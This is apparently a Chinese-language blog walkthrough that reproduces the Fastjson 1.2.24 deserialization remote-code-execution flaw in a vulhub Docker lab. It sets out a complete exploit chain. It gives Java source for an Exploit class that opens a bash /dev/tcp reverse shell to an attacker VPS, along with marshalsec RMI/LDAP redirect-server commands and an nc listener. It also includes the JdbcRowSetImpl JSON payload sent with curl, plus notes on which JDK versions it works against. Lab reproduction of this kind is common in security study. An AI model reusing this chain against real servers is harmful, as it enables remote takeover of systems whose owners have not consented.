Fastjson反序列化命令执行漏洞复现

基础了解

Fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。

反序列化常用的两种利用方式，一种是基于rmi，一种是基于ldap。
RMI是一种行为，指的是Java远程方法调用。
JNDI是一个接口，在这个接口下会有多种目录系统服务的实现，通过名称等去找到相关的对象，并把它下载到客户端中来。
ldap指轻量级目录访问协议。
具体详情请参考：基于Java反序列化RCE - 搞懂RMI、JRMP、JNDI

fastjson反序列漏洞利用过程存在java版本限制：
基于rmi的利用方式：适用jdk版本：JDK 6u141, JDK 7u131, JDK 8u121之前。
在jdk8u122的时候，加入了反序列化白名单的机制，关闭了rmi远程加载代码。
基于ldap的利用方式：适用jdk版本：JDK 11.0.1、8u182、7u191、6u201之前。
在Java 8u191更新中，Oracle对LDAP向量设置了相同的限制，并发布了CVE-2018-3149，关闭了JNDI远程类加载。
可以看到ldap的利用范围是比rmi要大的，实战情况下推荐使用ldap方法进行利用。

这里给出雷震众测的一张图：

环境介绍：

主机A：attacker（119.x.x.x）
jdk版本：8u151

主机B：模拟Fastjson漏洞环境（kali）
fastjson版本：1.2.24

这里我直接使用vulhub的漏洞环境，Kali自带就有docker，用docker-compose搭建一个写好的fastjson 1.2.24的环境。

启动fastjson环境：

# 启动docker服务
service docker start

# 查看已安装的镜像，获取fastjson的id
docker ps -a

# 正式启动
docker start id

用curl命令发送json数据看看环境搭是否运行

curl http://127.0.0.1:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'

利用过程

环境搭好就需要准备开始复现了，首先是写一个java文件编译为class文件，用于之后执行命令,这里准备了两个文件一个确定漏洞存在的命令（test）和一个反弹shell的（Exploit），写好后编译为class文件

将以下代码保存为Exploit.java（可以根据操作系统类型更改自己想要执行的命令）

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        //Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/119.x.x.x/8000;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

使用javac命令编译Exploit.java文件，生成一个Exploit.class文件

javac Exploit.java

把生成的Exploit.class文件，放到公网vps的web目录下，可以通过互联网的http服务访问到
在该目录使用 python 开启一个web服务

python -m SimpleHttpServer 80

访问提示可以下载即可

2、使用marshalsec启动一个RMI服务器，或者ladp服务器。
项目地址：https://github.com/mbechler/marshalsec
下载后切换到marshalsec目录下使用maven进行打包。

mvn clean package -DskipTests

打包成功后把生成的marshalsec-0.0.3-SNAPSHOT-all.jar上传到119.x.x.x

通过marshalsec启动一个RMI/LDAP服务监听的端口是8080
通过使用RMI或者LDAP的服务，将reference result 重定向到web服务器（即文件Exploit.class的存放位置）

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://119.x.x.x:80/#Exploit" 8080
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://119.x.x.x:80/#Exploit" 8080

实验环境的jdk版本为8u151，大于8u121小于8u191，理论上rmi无法使用，ldap可以使用。

3.主机A监听8000端口：

nc -lvp 8000

3.发送json数据类型的payload
在Kali上输入运行以下命令

curl http://127.0.0.1:8090/ -H "Content-Type: application/json" --data '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://119.x.x.x:8080/Exploit","autoCommit":true}}'

或者用浏览器发包：

{
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://119.x.x.x:8080/Exploit", 
        "autoCommit": true
    }
}

注意：这里是最初版本的RCE没有加入checkAutoType()函数校验，它的主要作用是检测@type指定的类是否在白名单、黑名单。后面的许多漏洞都是对checkAutotype以及本身某些逻辑缺陷导致的漏洞进行修复，以及黑名单的不断增加。
1.2.24版本之前autoTypeSupport属性为true才能使用。（fastjson>=1.2.25默认为false）

复现结果

ldap服务接受到了请求,在这里可以看到docker环境加载了我们vps服务器上的Exploit.class文件

成功返回数据包到vps的web服务上

Vps上的nc接收到反弹的shell

jdk版本限制绕过:

参考：Fastjson反序列化漏洞利用

后续计划：

收集不同版本的探测payload，rce payload，争取都复现一遍

参考如下

Fastjson1.2.24反序列化命令执行漏洞
 fastjson1.2.47反序列化漏洞复现
 Fastjson反序列化漏洞利用